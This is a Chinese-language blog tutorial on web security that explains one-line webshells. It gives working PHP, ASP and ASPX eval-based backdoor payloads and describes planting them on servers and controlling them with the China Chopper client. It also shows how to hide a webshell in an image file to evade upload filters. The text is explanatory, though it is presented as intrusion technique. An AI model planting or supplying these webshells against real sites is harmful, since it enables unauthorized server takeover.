IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> web安全的一句话木马 -> 正文阅读

[PHP知识库]web安全的一句话木马

一、WEBshell

Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。 webshell根据功能也分为大马、小马和一句话木马,例如:<%eval request(“pass”)%>通常把这句话写入一个文档里面,然后文件名改成xx.asp。然后传到服务器上面。用eval方法将request(“pass”)转换成代码执行,request函数的作用是应用外部文件。这相当于一句话木马的客户端配置。
在这里插入图片描述

二、一句话木马

概述:
在很多渗透测试过程中,渗透测试人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp,php,jsp,aspc都是如此。
最简单的php一句话木马:

<?php @eval($_POST['password']);?>

asp一句话木马:

<%eval request ("password")%>

aspx一句话木马:

<%@ Page Language=“Jscript”%><%eval(Request.Item[“password”,"unsafe"])%>

直接将一句话木马插入到文件上,在代码行加入一句话木马,然后把文件上传到网站上即可
入侵条件(只要满足三个条件,即可实现成功入侵)

  • 木马上传成功,未被杀
  • 知道木马上传路径
  • 上传的木马能正常运行

解析php一句话木马

   <?php @eval($_POST['zke']); ?>

密码:zke

  • PHP代码要写在<? php ?>里面,服务器才能认出这是php代码,然后去解析
  • @符号的意思是不报错,即使执行错误,也不报错
  • 密码是zke,php里面有几个超全局变量: G E T 、 _GET、 G?ET_POST就是其中之一,意思是$_POST[‘a’],用post的方法接收a这个变量
  • evall()把字符串作为PHP代码执行

中国菜刀与一句话木马

  1. 往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。
  2. 我们可以把一句话木马插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。
  3. 打开中国菜刀,在空白处点击鼠标右键,选择“添加”选项。 编辑相关参数,包括一句话木马所在的URL及密码,最后点击“编辑。
  4. 在URL列表中选中目标网站,点击鼠标右键,选择“文件管理”,可以看到网站的目录结构。

三、图片木马

木马如何才能上传成功?通常防御者都会对类型、大小进行过滤。另外,若规定是上传的图片,还会对图片进行采集。即使攻击者修改文件类型,也过不了图片采集那一关。所以,这就需要一张图片来做掩护。做成隐藏在图片下的木马。linux和windows都有相应的命令,能够让一个文件融合到另一个文件后面,达到隐藏的目的。

图片一句话制作

如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是:
首先准备好一张图片,一个一句话木马,以及同路径下的dos窗口

copy 文件1+文件2  生成文件3

在这里插入图片描述

四、小马和大马
小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来传大马的。因为小马体积小,比大马具有更强的隐蔽性,而且有些针对文件大小上传限制的漏洞,所以才有小马,小马也通常用来做备用后门等。

学习链接:
https://blog.csdn.net/weixin_39190897/article/details/86772765?
https://blog.csdn.net/weixin_39190897/article/details/85334893
http://www.legendsec.org/1701.html

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-12-15 18:04:22  更:2021-12-15 18:04:53 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:29:40-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码